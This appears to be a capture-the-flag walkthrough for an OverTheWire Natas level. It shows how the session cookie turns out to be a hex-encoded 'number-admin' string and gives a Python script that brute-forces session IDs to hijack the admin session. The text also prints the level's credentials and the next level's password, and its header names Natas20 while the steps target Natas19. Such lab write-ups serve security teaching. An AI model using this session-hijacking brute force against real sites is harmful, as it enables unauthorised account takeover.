Natas20
Website URL: http://overthewire.org/wargames/natas/natas20.html
According to the data on the OverTheWire webpage.
Username: natas20
URL: http://natas20.natas.labs.overthewire.orgLet’s log into the URL for Natas19
This time there isn’t the source code to view…we have to take reference from the previous level itself. Let’s log in using dummy credentials and intercept the POST request to see the PHPSESSID.
The PHPSESSID is set to 3332302d61646d696e. It’s obviously no longer restricted to 640 and its definitely not nearly as feasible for a brute force attack as we’d like it to be.
Repeating this a couple of times, you’ll observe that the last few characters viz “2d61646d696e” remain th same. This indicates that there is some pattern behind the generation of the Session ID. Since there are similarities in the generated session ID, there is a possibility that its encoded in some way. Let’s use the Decoder in Burp Suite to test it out.
So, the session ID is basically an ASCII encoded into hex characters. Pretty easy now. We’ll use a similar script as last time, trying out IDs till 640, except that this time we will encode and set it in the cookie.
import requests
from requests.auth import HTTPBasicAuth
from time import sleep
def main():
Auth = HTTPBasicAuth('natas19','4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs')
Data = {'username':'admin', 'password':'admin','admin':'1'}
maxchange = 0
for i in range(0,640):
sessstr = str(i)+'-admin'
sessid = sessstr.encode('hex')
cookie = {"PHPSESSID":sessid}
r = requests.get("http://natas19.natas.labs.overthewire.org/index.php?debug",params=Data,auth=Auth,cookies=cookie)
if('logged in as a regular user' not in r.text):
print("Admin:",i)
print(r.text)
break
return
if __name__=='__main__':
main()
Running it might take a couple of minutes.
Done!
Password for next level: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF